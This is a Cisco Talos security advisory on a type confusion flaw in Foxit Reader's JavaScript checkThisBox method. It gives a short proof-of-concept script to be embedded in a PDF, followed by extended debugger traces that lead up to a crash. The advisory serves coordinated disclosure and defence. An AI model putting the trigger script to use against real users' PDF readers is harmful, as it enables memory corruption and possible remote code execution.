Headline
CVE-2023-32664: TALOS-2023-1795 || Cisco Talos Intelligence Group
A type confusion vulnerability exists in the Javascript checkThisBox method as implemented in Foxit Reader 12.1.2.15332. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. User would need to open a malicious file to trigger the vulnerability.
SUMMARY
A type confusion vulnerability exists in the Javascript checkThisBox method as implemented in Foxit Reader 12.1.2.15332. A specially-crafted Javascript code inside a malicious PDF document can cause memory corruption and lead to remote code execution. User would need to open a malicious file to trigger the vulnerability.
CONFIRMED VULNERABLE VERSIONS
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Foxit Reader 12.1.2.15332
PRODUCT URLS
Foxit Reader - https://www.foxitsoftware.com/pdf-reader/
CVSSv3 SCORE
8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE
CWE-843 - Access of Resource Using Incompatible Type (‘Type Confusion’)
DETAILS
Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.
PDF Javascript API defines the checkThisBox method to check or uncheck widgets such as the check box or radio button. The first parameter (nWidget) of the method indicates the index of an individual widget. The second parameter is optional and the default value is true which checked the widget. There exists a type confusion when the checkThisBox method is called with an object of a different type rather than an Integer type. To demonstrate, the following code triggers this vulnerability:
function main() {
getField("Text Field1").setAction("Calculate",'f15();');
getField("Text Field1").setAction("Format",'f11();');
f11();
}
function f11(arg1, arg2, arg3) {
app.activeDocs[0].deletePages();
app.fs.transitions;
app.activeDocs[0].getField('Radio Button0').checkThisBox('a');
}
function f15(arg1, arg2, arg3) {
event.value = 0;
}
Note that the same vulnerability can be triggered with the defaultIsChecked method that takes nWidget as its first parameter. We can observe the following in the debugger (with PageHeap enabled):
0:000> g
Breakpoint 0 hit
eax=006ae408 ebx=006ae474 ecx=02b96430 edx=00000000 esi=441ceff8 edi=31514ff8
eip=02e5e239 esp=006ae3e0 ebp=006ae420 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf79370 (02b96430)} ; [1]
0:000> g
Breakpoint 1 hit
eax=04cbcf48 ebx=31514f01 ecx=1cb96c54 edx=2998afe8 esi=105926e0 edi=1cb96c50
eip=01bae4c7 esp=006ae2a8 ebp=006ae2b8 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7147:
01bae4c7 56 push esi ; [2]
0:000> dd esi
105926e0 00000002 00000000 23225680 105925c0
105926f0 00000000 232338e8 00000001 00000001
10592700 00000000 00000004 00000000 00000000
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> u
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7147:
01bae4c7 56 push esi
01bae4c8 ff5060 call dword ptr [eax+60h] ; [3]
01bae4cb 8bd8 mov ebx,eax
01bae4cd 85db test ebx,ebx
01bae4cf 7808 js FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7159 (01bae4d9)
01bae4d1 56 push esi
01bae4d2 8bcf mov ecx,edi
01bae4d4 e827ee0000 call FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f80 (01bbd300)
0:000> ba w4 105926e0+0xC ; [4]
0:000> g
Breakpoint 0 hit
eax=006ad9e8 ebx=006ada54 ecx=02b30420 edx=00000000 esi=4ac88ff8 edi=4ac86ff8
eip=02e5e239 esp=006ad9c0 ebp=006ada00 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf13360 (02b30420)}
0:000> g
Breakpoint 5 hit ; [5]
eax=0000001f ebx=04c40a58 ecx=00000007 edx=62626952 esi=04c40a58 edi=105926ec
eip=04519e0b esp=006ad77c ebp=006ad7a0 iopl=0 nv up ei pl nz na po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200203
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6db:
04519e0b 83c704 add edi,4
0:000> dd 105926e0
105926e0 00000001 0000001f 0000001f 62626952
105926f0 00000000 232338e8 00000000 00000001
10592700 00000000 00000004 00000000 00000000
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> da 105926ec
105926ec "Ribb"
0:000> kb L3
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ad7a0 011ba996 04c40a58 ffffffff 105926e0 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6db
01 006ad7d4 011b9b65 1471ada0 006ad7b0 00000014 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x4100f6
02 006ad7e8 011b82be 1471ada0 006ad814 00adcc1b FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x40f2c5
0:000> g
Breakpoint 5 hit ; [6]
eax=2a75eff2 ebx=1c758fa0 ecx=00000022 edx=00000001 esi=2a75efd0 edi=105926ec
eip=04519ded esp=006ad6f8 ebp=006ad718 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6bd:
04519ded f30f7f4f10 movdqu xmmword ptr [edi+10h],xmm1 ds:002b:105926fc=00736e6f6974704f6e61635374736f50
0:000> dd 105926e0
105926e0 00000001 00000011 00000011 006f0048
105926f0 00690072 006f007a 0074006e 74736f50
10592700 6e616353 6974704f 00736e6f 00000000
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> du 105926e0+0xc
105926ec "Horizont潐瑳捓湡灏楴湯s"
0:000> kb L3
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ad718 0214ae48 00000011 2a75efd0 23233ba8 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x43d6bd
01 006ad730 01cfd04e 2a75efd0 006ad758 6b2f6f34 FoxitPDFReader!safe_vsnprintf+0x52dd88
02 006ad73c 6b2f6f34 23233ba8 2a75efd0 00000000 FoxitPDFReader!safe_vsnprintf+0xdff8e
0:000> g
Breakpoint 0 hit
eax=006ad9e0 ebx=006ada4c ecx=02b32520 edx=00000000 esi=33d8aff8 edi=33d88ff8
eip=02e5e239 esp=006ad9b8 ebp=006ad9f8 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!FXJSE_GetClass+0x269:
02e5e239 ffd1 call ecx {FoxitPDFReader!safe_vsnprintf+0xf15460 (02b32520)}
0:000> g
Breakpoint 2 hit
eax=10592860 ebx=00000001 ecx=1cb96c50 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd319 esp=006ae15c ebp=006ae170 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f99:
01bbd319 8bc8 mov ecx,eax
0:000> g
Breakpoint 2 hit
eax=105926e0 ebx=0074006e ecx=1cb96c50 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd319 esp=006ae28c ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f99:
01bbd319 8bc8 mov ecx,eax ; [7]
0:000> dd eax
105926e0 00000001 00000011 00000011 006f0048
105926f0 00690072 006f007a 0074006e 006c0061
10592700 00490020 0077006e 00720061 00000064
10592710 00000006 00000000 0000002a 00000000
10592720 00000000 10594560 00000010 0000000c
10592730 10595f5c 10595f38 0000000a 00000000
10592740 00010106 10592710 00000000 00000000
10592750 00000000 105945a0 00000010 00000002
0:000> du 105926e0+0xc
105926ec "Horizontal Inward"
0:000> p
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01bbd31b esp=006ae28c ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5f9b:
01bbd31b e8e0db3a00 call FoxitPDFReader!safe_vsnprintf+0x34de40 (01f6af00) ; [8]
0:000> t
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af00 esp=006ae288 ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de40:
01f6af00 55 push ebp
0:000> p
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af01 esp=006ae284 ebp=006ae2a0 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de41:
01f6af01 8bec mov ebp,esp
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af03 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de43:
01f6af03 8b5508 mov edx,dword ptr [ebp+8] ss:002b:006ae28c=00000000
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af06 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
FoxitPDFReader!safe_vsnprintf+0x34de46:
01f6af06 85d2 test edx,edx
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af08 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x34de48:
01f6af08 7817 js FoxitPDFReader!safe_vsnprintf+0x34de61 (01f6af21) [br=0]
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0a esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200246
FoxitPDFReader!safe_vsnprintf+0x34de4a:
01f6af0a 3b5118 cmp edx,dword ptr [ecx+18h] ds:002b:105926f8=0074006e
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0d esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de4d:
01f6af0d 7d12 jge FoxitPDFReader!safe_vsnprintf+0x34de61 (01f6af21) [br=0]
0:000>
eax=105926e0 ebx=0074006e ecx=105926e0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af0f esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de4f:
01f6af0f 83c110 add ecx,10h
0:000>
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af12 esp=006ae284 ebp=006ae284 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!safe_vsnprintf+0x34de52:
01f6af12 3b5108 cmp edx,dword ptr [ecx+8] ds:002b:105926f8=0074006e
0:000>
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af15 esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de55:
01f6af15 7d10 jge FoxitPDFReader!safe_vsnprintf+0x34de67 (01f6af27) [br=0]
0:000>
eax=105926e0 ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af17 esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de57:
01f6af17 8b4104 mov eax,dword ptr [ecx+4] ds:002b:105926f4=006f007a
0:000>
eax=006f007a ebx=0074006e ecx=105926f0 edx=00000000 esi=00000000 edi=1cb96c50
eip=01f6af1a esp=006ae284 ebp=006ae284 iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200293
FoxitPDFReader!safe_vsnprintf+0x34de5a:
01f6af1a 8b0490 mov eax,dword ptr [eax+edx*4] ds:002b:006f007a=3f3f3f3f ; [9]
dd 006f007a
006f007a 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f008a 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f009a 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00aa 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00ba 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
006f00ca 3f3f3f3f 3f3f3f3f 3f3f3f3f 3f3f3f3f
At [1], the Field.checkThisBox method is called which eventually calls a method at [3]. The pointer passed as an argument to the method is examined at [2]. A breakpoint is set on write access of the memory pointed to by the pointer at [4]. The breakpoint was hit at [5] and [6] where the pointer is confused as a string object and a string object is written to it. This causes type confusion condition. Later at [7], the vulnerable pointer is passed as this argument to the method [8] where it is dereferenced. Here the crash didn’t occur as the arbitrary memory ([9]) is allocated and contains the value 0x3f3f3f3f. The crash occurs later in the code when the memory pointed to by 0x3f3f3f3f is dereferenced. This can be observed in a debugger at the time of the crash:
0:000>
eax=2998afe8 ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75db esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025b:
01bb75db 8b4508 mov eax,dword ptr [ebp+8] ss:002b:006ae288=3f3f3f3f
0:000>
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000>
(1544.1cd4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000> dd 3f3f3f47
3f3f3f47 ???????? ???????? ???????? ????????
3f3f3f57 ???????? ???????? ???????? ????????
3f3f3f67 ???????? ???????? ???????? ????????
3f3f3f77 ???????? ???????? ???????? ????????
3f3f3f87 ???????? ???????? ???????? ????????
3f3f3f97 ???????? ???????? ???????? ????????
3f3f3fa7 ???????? ???????? ???????? ????????
3f3f3fb7 ???????? ???????? ???????? ????????
0:000> g
(1544.1cd4): Access violation - code c0000005 (!!! second chance !!!)
eax=3f3f3f3f ebx=1cb96c50 ecx=2998afe8 edx=2998afe8 esi=00000000 edi=1cb96c50
eip=01bb75de esp=006ae240 ebp=006ae280 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8] ds:002b:3f3f3f47=????????
0:000> u
FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e:
01bb75de 8b7808 mov edi,dword ptr [eax+8]
01bb75e1 8b4308 mov eax,dword ptr [ebx+8]
01bb75e4 897de8 mov dword ptr [ebp-18h],edi
01bb75e7 85c0 test eax,eax
01bb75e9 7404 je FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f026f (01bb75ef)
01bb75eb 8b08 mov ecx,dword ptr [eax]
01bb75ed eb02 jmp FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f0271 (01bb75f1)
01bb75ef 33c9 xor ecx,ecx
0:000> kb
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 006ae280 01bbd32a 3f3f3f3f 00000001 1cb96c50 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f025e
01 006ae2a0 01bae4d9 105926e0 1421ef01 105926e0 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4f5faa
02 006ae2b8 01f6a085 105926e0 006ae2d8 ea3b87ec FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x4e7159
03 006ae328 02bb96c8 00000000 1421ef01 00000001 FoxitPDFReader!safe_vsnprintf+0x34cfc5
04 006ae384 02b96582 1421eff8 00000001 006ae3ac FoxitPDFReader!safe_vsnprintf+0xf9c608
05 006ae3d8 02e5e23b 1421eff8 006ae408 006ae400 FoxitPDFReader!safe_vsnprintf+0xf794c2
06 006ae420 030425ab 4ba77600 4f4ecf71 4ba77600 FoxitPDFReader!FXJSE_GetClass+0x26b
07 006ae488 03041d6e 006ae4d0 4f4ecf71 006ae5ac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3c9b
08 006ae51c 03042025 006ae54c 4ba77600 006ae5ac FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e345e
09 006ae564 03041eab 006ae57c 00000006 006ae5bc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e3715
0a 006ae580 0326432b 00000006 006ae5bc 4ba77600 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x1e359b
0b 006ae5a0 03200389 3fb82339 4f4ed7d5 0000000c FoxitPDFReader!CFXJSE_Arguments::GetValue+0x405a1b
0c 006ae5e4 03200389 4f4feb6d 3fb82339 3fb82339 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0d 006ae620 03200389 4f4feb6d 4f551e41 4f551ea5 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0e 006ae64c 031fea10 4f4feb6d 3fb821b1 4f551e41 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a1a79
0f 006ae664 031fe839 00000000 00000000 00000002 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3a0100
10 006ae690 02e9aa8e 4ba77600 3fb82339 4f551e41 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x39ff29
11 006ae7a0 02e9a5a2 006ae934 4ba77600 006ae7fc FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3c17e
12 006ae828 02e832a4 006ae934 4ba77600 44937024 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3bc92
13 006ae9d8 02e82da0 006aea74 44937050 00000000 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24994
14 006ae9ec 02e5c7af 006aea74 44937050 ea3b8ea0 FoxitPDFReader!CFXJSE_Arguments::GetValue+0x24490
15 006aea64 02e5d0e6 44937024 44930ff8 44937010 FoxitPDFReader!FXJSE_Runtime_Release+0xd5f
16 006aeaa0 02ad4a14 366e8fd8 0d2d84f4 44930ff8 FoxitPDFReader!FXJSE_ExecuteScript+0x86
17 006aeb04 02ad5900 00000000 006aeb90 006aeb38 FoxitPDFReader!safe_vsnprintf+0xeb7954
18 006aeb18 0107119d 006aeb90 006aeb38 ea3b8f8c FoxitPDFReader!safe_vsnprintf+0xeb8840
19 006aeb48 01070064 2a62ef40 00000015 006aeb70 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c68fd
1a 006aeb88 0106eae0 232b2660 1471ada0 3d640fb8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c57c4
1b 006aebdc 0099a522 006aec0c 1471ada0 3d640fb8 FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x2c4240
1c 006aec2c 00bf76db 00000000 ea3b9c94 7fffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x8a02
1d 006af850 042ad52b 00000000 00000000 ea3b9de4 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x64bcb
1e 006af920 042ae704 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d0dfb
1f 006af944 042a90aa 00000429 00000000 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1d1fd4
20 006af9b8 042a991d 44f90e20 002b0330 00000429 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cc97a
21 006af9d8 76dd23a3 002b0330 00000429 00000000 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x1cd1ed
22 006afa04 76dc30b6 042a98e9 002b0330 00000429 USER32!_InternalCallWinProc+0x2b
23 006afafc 76dc1975 042a98e9 00000000 00000429 USER32!UserCallWinProcCheckWow+0x4c6
24 006afb78 76dc14c0 00000429 006afba0 00b7d3c4 USER32!DispatchMessageWorker+0x4a5
25 006afb84 00b7d3c4 0f43eec8 0f43eec8 06117798 USER32!DispatchMessageW+0x10
26 006afba0 00b7d483 06117798 00b7d3f0 ffffffff FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128684
27 006afbc0 046cb2fe 00000000 06143b14 077b8000 FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x128743
28 006afbd8 04490cc0 00760000 00000000 0c194360 FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x5eebce
29 006afc24 75f67d59 077b8000 75f67d40 006afc8c FoxitPDFReader!FPDFSCRIPT3D_OBJ_Node__Method_DetachFromCurrentAnimation+0x3b4590
2a 006afc34 772fb74b 077b8000 afc13d74 00000000 KERNEL32!BaseThreadInitThunk+0x19
2b 006afc8c 772fb6cf ffffffff 7732867c 00000000 ntdll!__RtlUserThreadStart+0x2b
2c 006afc9c 00000000 04490d8f 077b8000 00000000 ntdll!_RtlUserThreadStart+0x1b
In the above debugger output, the value of eax is 0x3f3f3f3f that we got it from the type confused pointer. The crash occurs when eax is dereferenced as if it were an object pointer. Depending on the memory layout of the process, it may be possible to do arbitrary read and write access which could ultimately be abused to achieve arbitrary code execution.
VENDOR RESPONSE
Foxit provided patches here: https://www.foxit.com/downloads/#Foxit-Reader/ and here: https://www.foxit.com/downloads/#Foxit-PhantomPDF-Business/
TIMELINE
2023-07-03 - Vendor Disclosure
2023-07-19 - Vendor Patch Release
2023-07-19 - Public Release
Discovered by Kamlapati Choubey and Aleksandar Nikolic of Cisco Talos.
Related news
A type confusion vulnerability exists in the way Foxit Reader 12.1.2.15356 handles field value properties. A specially crafted Javascript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability. Exploitation is also possible if a user visits a specially crafted, malicious site if the browser plugin extension is enabled.
Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.